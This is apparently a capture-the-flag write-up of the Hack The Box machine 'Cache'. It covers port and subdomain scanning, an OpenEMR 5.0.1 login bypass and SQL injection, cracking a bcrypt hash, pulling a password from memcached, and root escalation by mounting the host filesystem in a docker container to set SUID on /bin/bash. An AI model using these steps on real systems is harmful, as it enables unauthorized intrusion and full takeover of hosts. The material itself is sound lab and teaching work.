$ nmap -p- --min-rate 5000 10.129.211.212
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 10:30 EDT
Nmap scan report for 10.129.211.212
Host is up (0.0089s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Accidental Subdomain Enum
Port 80 reveals a blog like website:
There's not much here, but we can add cache.htb to our /etc/hosts file since there's a banner for it on screen. I ran a gobuster and wfuzz scan on the machine. Funnily, I accidentally had a typo in my wfuzz command, and found a completely new domain present:
$ wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H 'Host:FUZZ.htb' --hw=973 -u http://cache.htb /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://cache.htb/
Total requests: 19966
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000010187: 302 0 L 0 W 0 Ch "hms"
hms.htb is active on this machine. We can visit that.
OpenEMR
The page shows us a login for OpenEMR, which is known to have a ton of vulnerabilities:
We can head to the Github Repo for this software and attempt to find its version using the default files present:
Visiting sql_patch.php reveals that this is OpenEMR 5.0.1:
There's also an authentication bypass exploit here:
To bypass it, all we have to do is simply visit /portal/account/register.php, and it would treat us as logged in with a valid token. Searching for exploits led me to a PDF that had the vulnerability report for v5.0.1.3, and there are lot including a lot of SQL Injections.
Firstly, visiting /portal/find_appt_popup_user.php just works as we have 'bypassed' the login.
For this case, the second PoC listed works best.
Using sqlmap, we can enumerate and view the stuff in the database. (skipped the enumeration)
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx (?)
1g 0:00:00:00 DONE (2023-05-10 10:53) 5.555g/s 4800p/s 4800c/s 4800C/s lester..felipe
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now that we have the admin password, we can do RCE.
When we enumerate the ports that are open, we can see that port 11211 is listening:
ash@cache:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN -
<TRUNCATED>
ash@cache:~$ echo "get passwd" | nc -vn -w 1 127.0.0.1 11211
Connection to 127.0.0.1 11211 port [tcp/*] succeeded!
VALUE passwd 0 9
0n3_p1ec3
END
Docker Group
luffy is part of the docker group.
luffy@cache:/home/ash$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
luffy@cache:/home/ash$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
ubuntu latest 2ca708c1c9cc 3 years ago 64.2MB
We can just run this command to create an Ubuntu container that is mounted on the main file system, where we have access to the container as root. This effectively gives us root access to the main file system to make /bin/bash an SUID binary.
luffy@cache:/home/ash$ docker run -it --rm -v /:/mnt ubuntu chroot /mnt bash
root@ee809b31a278:/# id
uid=0(root) gid=0(root) groups=0(root)
root@ee809b31a278:/# cd root
root@ee809b31a278:~# ls
root.txt run.sh should_work
root@ee809b31a278:~# chmod u+s /bin/bash
Then we can exit this and get a shell with EUID of root.